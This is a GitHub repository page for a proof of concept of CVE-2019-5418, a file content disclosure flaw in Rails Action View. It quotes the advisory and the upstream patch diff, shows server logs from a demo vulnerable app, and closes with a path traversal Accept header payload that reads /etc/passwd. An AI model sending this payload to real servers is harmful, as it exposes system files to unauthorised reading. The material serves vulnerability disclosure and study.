Skip to content
CVE-2019-5418 - File Content Disclosure on Rails
Branch: master
Clone or download
Latest commit be10e3a Mar 25, 2019
Type Name Latest commit message Commit time
Failed to load latest commit information.
demo Add demo rails app Mar 16, 2019 Update Mar 25, 2019

CVE-2019-5418 - File Content Disclosure on Rails

EDIT: this CVE can lead to a Remote Code Execution, more info:

There is a possible file content disclosure vulnerability in Action View. Specially crafted accept headers in combination with calls to render file: can cause arbitrary files on the target server to be rendered, disclosing the file contents.

The impact is limited to calls to render which render file contents without a specified accept format. Impacted code in a controller looks something like this:

found by John Hawthorn from GitHub


Technical Analysis:

Security Advisory:

Fixed in Action View 6.0.0.beta3,,,,

From f4c70c2222180b8d9d924f00af0c7fd632e26715 Mon Sep 17 00:00:00 2001
From: John Hawthorn <>
Date: Mon, 4 Mar 2019 18:24:51 -0800
Subject: [PATCH] Only accept formats from registered mime types

 .../lib/action_dispatch/http/mime_negotiation.rb   |  5 +++++
 actionpack/test/controller/mime/respond_to_test.rb | 10 ++++++----
 .../new_base/content_negotiation_test.rb           | 14 ++++++++++++--
 3 files changed, 23 insertions(+), 6 deletions(-)

diff --git a/actionpack/lib/action_dispatch/http/mime_negotiation.rb b/actionpack/lib/action_dispatch/http/mime_negotiation.rb
index 498b1e669576..4e81ba12a58b 100644
--- a/actionpack/lib/action_dispatch/http/mime_negotiation.rb
+++ b/actionpack/lib/action_dispatch/http/mime_negotiation.rb
@@ -79,6 +79,11 @@ def formats
+          v = do |format|
+            format.symbol || format.ref == "*/*"
+          end
           set_header k, v

Proof Of Concept

  1. Run the vulnerable application inside the demo folder:
foo@bar:~$ cd demo/
foo@bar:~$ bundle install
foo@bar:~$ rails s                                                                                                                12:59:54
=> Booting Puma
=> Rails 5.2.1 application starting in development 
=> Run `rails server -h` for more startup options
Puma starting in single mode...
* Version 3.12.0 (ruby 2.5.1-p57), codename: Llamas in Pajamas
* Min threads: 5, max threads: 5
* Environment: development
* Listening on tcp://
Use Ctrl-C to stop
Started GET "/" for at 2019-03-16 13:00:00 +0100
Processing by Rails::WelcomeController#index as HTML
  Rendering /var/lib/gems/2.5.0/gems/railties-5.2.1/lib/rails/templates/rails/welcome/index.html.erb
  Rendered /var/lib/gems/2.5.0/gems/railties-5.2.1/lib/rails/templates/rails/welcome/index.html.erb (1.4ms)
Completed 200 OK in 8ms (Views: 2.7ms | ActiveRecord: 0.0ms)

Started GET "/chybeta" for at 2019-03-16 13:00:03 +0100
Processing by ChybetaController#index as HTML
  Rendering within layouts/application
  Rendered within layouts/application (0.2ms)
Completed 200 OK in 122ms (Views: 121.1ms | ActiveRecord: 0.0ms)
  1. Go to the route /chybeta
  2. Intercept with burp the request and replace the Accept header with Accept: ../../../../../../../../../../etc/passwd{{



You can’t perform that action at this time.